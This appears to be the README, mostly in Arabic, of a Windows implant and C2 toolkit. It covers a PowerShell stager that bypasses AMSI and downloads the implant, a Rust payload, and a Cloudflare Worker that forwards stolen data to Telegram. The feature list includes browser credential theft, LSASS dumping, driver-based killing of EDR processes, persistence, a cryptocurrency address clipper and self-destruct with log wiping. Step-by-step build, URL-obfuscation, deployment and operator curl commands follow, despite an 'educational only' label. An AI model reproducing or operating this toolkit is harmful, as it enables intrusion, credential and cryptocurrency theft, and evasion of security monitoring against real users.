
إمبلانت من الفئة النخبوية فائقة التطور من البداية إلى النهاية 0day. سلسلة قتل كاملة. استغلال، تصعيد، محورية، تسميم، استمرارية.
@abraxas_null
·
[email protected]
·
abraxaslabs.tech
·
github.com/abraxas/veneficus
Credit: @YoSoth0
مجموعة أدوات زرع (implant) لنظام Windows 10/11 x64: PowerShell stager، وRust PE، وCloudflare Worker يقوم بإشعار المشغّل عبر Telegram.
الـ stager (resources/loader.ps1) مُصمَّم لإسكات AMSI في عملية PowerShell الحالية، وسحب الـ implant من مسار /beacon الخاص بالـ Worker، ثم تشغيله باسم %TEMP%\MicrosoftEdgeUpdate.exe. بعد ذلك يقوم الـ PE بتقييم المضيف بحثًا عن آثار بيئات الحماية/المحلّلين. الدرجة العالية تمحو الملف التنفيذي؛ والدرجة المتوسطة تدخل في "الوضع الآمن" (بصمة فقط)؛ والدرجة المنخفضة تشغّل الحزمة الكاملة — تصحيحات AMSI/ETW، وBYOVD pool ضد عمليات EDR المُسمّاة، وسرقة بيانات اعتماد المتصفح، وسلسلة استخراج LSASS، واستمرارية عبر WMI/المهام المجدولة/Run، ووكيل SOCKS5 محلي، ومستمع HVNC/RFB محلي، وقاطع محتوى (clipper) لعناوين العملات الرقمية. حلقة HTTPS مُتشوّشة (jittered) تُرسل beacon وتستعلم عن مجموعة أوامر صغيرة (/status، /proxy_on، /self_destruct، /re_infect، /sleep، ومفاتيح تبديل الوضع الآمن). يتم التسريب (Exfil) باستخدام AES-256-GCM مع HMAC، بمفتاح مشتق من UUID مُضمَّن وقت الترجمة؛ ومن المفترض أن يقوم الـ Worker بتمرير النص المشفّر دون الاحتفاظ بالمفتاح.
هذا المستودع منشور لأغراض التعليم والتحليل. قراءة ملفًا بملف لما هو مُنفَّذ مقابل ما هو مُعلَّق (stubbed) متوفرة في VENEFICUS_MINI_v3_DEEP_ANALYSIS.md.
لأغراض تعليمية فقط. 2026 جميع الحقوق معكوسة.
VICTIM MACHINE
loader.ps1 (AMSI/ETW bypass → download → execute)
└── veneficus_mini.exe
├── Environment assessment (sandbox/VM/analyst detection)
├── Stealth: syscall bypass chain, lacuna stack-spoof, DKOM, AMSI/ETW patch
├── BYOVD: kill EDR processes (K7RKScan, ThrottleStop, BdApi, TrueSight, wsftprm, RTCore64)
├── Payload: creds, cookies, LSASS dump, device fingerprint
├── Persistence: WMI / Scheduled Task / Registry (three-way fallback)
├── SOCKS5 proxy (127.0.0.1:1080 by default, configurable)
├── HVNC (127.0.0.1:5900 by default, configurable)
├── Clipper: crypto address hijacking (BTC, ETH, LTC, XMR, DOGE, SOL, XRP, BNB, USDT)
└── C2 loop: AES-GCM encrypted poll every 10 ± 3s (safe mode: 60 ± 18s)
↕ HTTPS
CLOUDFLARE WORKER
/beacon → implant download
/exfil → receive encrypted data → forward ciphertext to Telegram
/commands → return queued commands (one-time queue)
/config → return operator config blob
/admin → queue commands (requires X-Admin-Key)
/register → register UUID (requires X-Admin-Key)
/unregister → revoke UUID (requires X-Admin-Key)
/listing → list all UUIDs (requires X-Admin-Key)
/set_config → push config (requires X-Admin-Key)
↓
TELEGRAM BOT
Receives: ciphertext + nonce + HMAC (operator decrypts offline)
| المكوّن | طريقة التثبيت |
|---|---|
| Rust + cargo | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh |
| هدف الترجمة المتقاطعة لنظام Windows | rustup target add x86_64-pc-windows-gnu |
| رابط MinGW المتقاطع | sudo apt install mingw-w64 |
| Wrangler (واجهة سطر أوامر CF Worker) | npm install -g wrangler |
wrangler login
wrangler init veneficus-relay
# Replace worker.js with cloudflare/worker.js
wrangler secret put TELEGRAM_TOKEN # from @BotFather
wrangler secret put TELEGRAM_CHAT_ID # your chat/group ID
wrangler secret put ADMIN_KEY # random 32-char secret
wrangler kv:namespace create "UUID_KV"
wrangler kv:namespace create "COMMANDS_KV"
wrangler kv:namespace create "CONFIG_KV"
# Add KV bindings to wrangler.toml:
# [[kv_namespaces]]
# binding = "UUID_KV"
# id = "<uuid_kv_id>"
# (repeat for COMMANDS_KV, CONFIG_KV)
wrangler deploy
import base64
url = b"https://your-worker.workers.dev"
key = 0xAF
enc = bytes([b ^ key for b in url])
print(base64.b64encode(enc).decode()) # → set as RELAY_URL_BYTES
RELAY_URL_BYTES="<output_above>" \
BYOVD_DRIVER_DIR="./drivers" \
TOOLS_DIR="./tools" \
cargo build --release --target x86_64-pc-windows-gnu
ضع ملفات التعريف .sys القابلة للاستغلال في drivers/ والملفات التنفيذية للأدوات في tools/ قبل البناء.
اقرأ UUID من الملف التنفيذي (مُضمَّن وقت البناء):
strings target/x86_64-pc-windows-gnu/release/veneficus_mini.exe | grep -E "[0-9a-f]{8}-[0-9a-f]{4}"
سجّل عبر واجهة admin API:
curl -X POST https://your-worker.workers.dev/register \
-H "X-Admin-Key: YOUR_ADMIN_KEY" \
-H "Content-Type: application/json" \
-d '{"implant_uuid":"<uuid>","note":"op_blackbird_host01"}'
curl -X POST https://your-worker.workers.dev/set_config \
-H "X-Admin-Key: YOUR_ADMIN_KEY" \
-H "Content-Type: application/json" \
-d '{
"implant_uuid": "global",
"config": {
"clipper_addresses": {
"bitcoin": "bc1qyourwallethere",
"ethereum": "0xYOURWALLETHERE"
},
"reinfect_url": "https://your-worker.workers.dev/beacon"
}
}'
أرسلها عبر نقطة النهاية /admin:
curl -X POST https://your-worker.workers.dev/admin \
-H "X-Admin-Key: YOUR_ADMIN_KEY" \
-H "Content-Type: application/json" \
-d '{"implant_uuid":"<uuid>","command":"/status"}'
| الأمر | التأثير |
|---|---|
/self_destruct | محو بثلاث مرات + مسح سجل الأحداث + الخروج |
/re_infect | تنزيل حمولة جديدة من reinfect_url في الإعدادات، واستبدال نفسه |
/status | إرسال PID، وحالة الوكيل، والوضع الآمن، وUUID إلى C2 |
/proxy_on | تفعيل وكيل SOCKS5 |
/proxy_off | تعطيل وكيل SOCKS5 |
/exit_safe | الخروج من الوضع الآمن، واستئناف التشغيل الكامل |
/enter_safe | الدخول في الوضع الآمن (بصمة فقط) |
/sleep <secs> | تجاوز الفاصل الأساسي لاستعلام C2 |
| الوحدة | السلسلة (الأيسر = يُجرَّب أولًا) |
|---|---|
| BYOVD | K7RKScan → BdApiUtil64 → TrueSight → ThrottleStop → STProcessMonitor → wsftprm → RTCore64 → capcom → disable blocklist |
| LSASS | MiniDumpWriteDump (native) → WDigest patch → LSA Whisperer → DumpGuard → PPL bypass (RTCore64) |
| NTLM | PrinterBug → PetitPotam → cross-protocol relay (HTTP→LDAP) → CVE-2025-33073 → MSSQL relay |
| Syscalls | Tartarus Gate → Halo's Gate → ntdll unhook → indirect → standard WinAPI |
| DKOM | EPROCESS unlink → PspChained enumeration → EDR callback unregister |
| Persistence | WMI subscription → Scheduled Task → HKLM Run key |